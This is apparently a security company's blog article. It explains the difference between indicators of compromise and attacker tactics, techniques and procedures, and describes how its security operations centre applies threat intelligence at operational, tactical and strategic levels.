When cybercriminals strike, they leave behind digital fingerprints. These traces, known as IoCs, can help you detect recurring threats, but not all clues hold up equally well in different situations.
Each cyberattack leaves behind evidence indicating that an attack has occurred. For a server breach, this might include the IP address from which the attack originated. For a phishing email, it could be the email address and domain of the phishing site. For malware files, this may involve their hash value. These are Indicators of Compromise (IOCs), that can be documented and used to detect the same type of attack in the future.
IoCs are particularly effective for detecting phishing. This is because phishing emails referring to the same domain of the phishing site are sent to numerous email addresses. As soon as we know that this domain hosts a phishing site, we can detect this for future recipients. However, for advanced attacks, IoCs are not as beneficial. If cyber criminals attack a server of organization X from a particular virtual machine in the cloud, they’ll likely carry out the same attack on organization Y from a different virtual machine with another IP address. This makes the IP address from which the attack originated a less reliable IoC as it doesn’t generalize well to other cases. While it can help detect attacks from the same IP address instantly, this indicator is generally more volatile and not valid for long.
Instead of focusing on one-off clues, TTPs reveal the “how” behind an attack. By studying adversary behaviors, you can spot patterns that remain relevant long after an IP address or domain changes.
Another approach is to examine the behavior, actions, or processes used by threat actors. So, if a server is compromised, instead of focusing on the IP address of the origin, you would assess the mechanism used to deliver the malware. For example, if malware is downloaded and installed on a workstation, you could do this by using a legitimate tool on the workstation (a LOLBin or Living Off The Land Binary), such as Curl or Certutil, by connecting to an IP address hosting the malware. The attackers might change the IP address, but using Curl to download a file from an IP address instead of using a fully qualified domain name could indicate attacker tools are being pulled onto the system.
These Tactics, Techniques, and Procedures (TTPs) are a more reliable way to detect attacks because they generalize well. Of course, some will only be relevant for a limited time. For instance, a year ago, cyberattackers concealed malware in OneNote documents emailed to their victims. When this method gained popularity, Microsoft updated OneNote to prevent it from starting other processes. This TTP then became irrelevant. However, downloading malware from LOLBins will always remain a relevant TTP: programs with built-in download mechanisms will always exist, as a lot of legitimate functionality, such as update mechanisms, relies on this capability. TTPs are generally less volatile than IoCs.
Threat intelligence is only useful if it’s applied effectively. At Cegeka’s Modern SOC, we translate IoCs and TTPs into operational, tactical, and strategic insights to help our clients stay resilient.
For threat intelligence, Cegeka’s Modern SOC operates on three levels: operational, tactical, and strategic.
On the operational level, we promptly detect threats by correlating known IoCs with data from our SIEM (Security Information and Event Management) platforms. We identify IP addresses, URLs, domains, and file hashes previously observed in attacks. We also use these IoCs to enrich security incident data. We rely on a curated threat intelligence source from an industry-leading partner assigning a risk score to each IoC hence providing a good balance between detection rate and false positives.
On the tactical level, we perform threat hunting based on relevant TTPs extracted from our threat intelligence sources. Our senior CSIRT analysts regularly review our security logs, manually examining all occurrences of a specific TTP. They filter out any instance that seems legitimate, until they identify something that deviates from the normal behavior, potentially leading to the detection of an attack. Our threat intelligence sources also support detection engineering: determining exactly what we should detect (and prevent) to maximize threat coverage efficiently.
On the strategic level, we write threat intelligence reports with a comprehensive analysis of incidents, attacks, and emerging trends or techniques. We do this at the request of the client or on our own initiative. The purpose of these reports is to monitor trends in the global threat landscape to inform our strategic decisions, investments, and engineering efforts. This is how we noticed attackers increasingly bypassing EDR (Endpoint Detection & Response) tools a few years ago. After analyzing this trend, we opted to invest in complementary NDR (Network Detection & Response) tools, while still realizing the importance of EDR. We also use threat intelligence for threat modeling: analyzing our client’s risk profile, identifying the relevant threat actors for the client, evaluating gaps in their defenses, and then providing quantitative advice on effectively addressing these gaps. Therefore, on a strategic level, threat intelligence enables us to make informed decisions and offer sound advice to our clients.
When you understand both the clues attackers leave behind and the methods they rely on, you can strengthen your defenses more effectively. That’s the true value of threat intelligence: turning data into clear, actionable security decisions.
Threat intelligence is vital for gaining insights into your attackers. Understanding what your attackers use (IoCs) and how they implement it (TTPs) allows you to respond quickly and protect your systems from those attacks that have previously succeeded with others.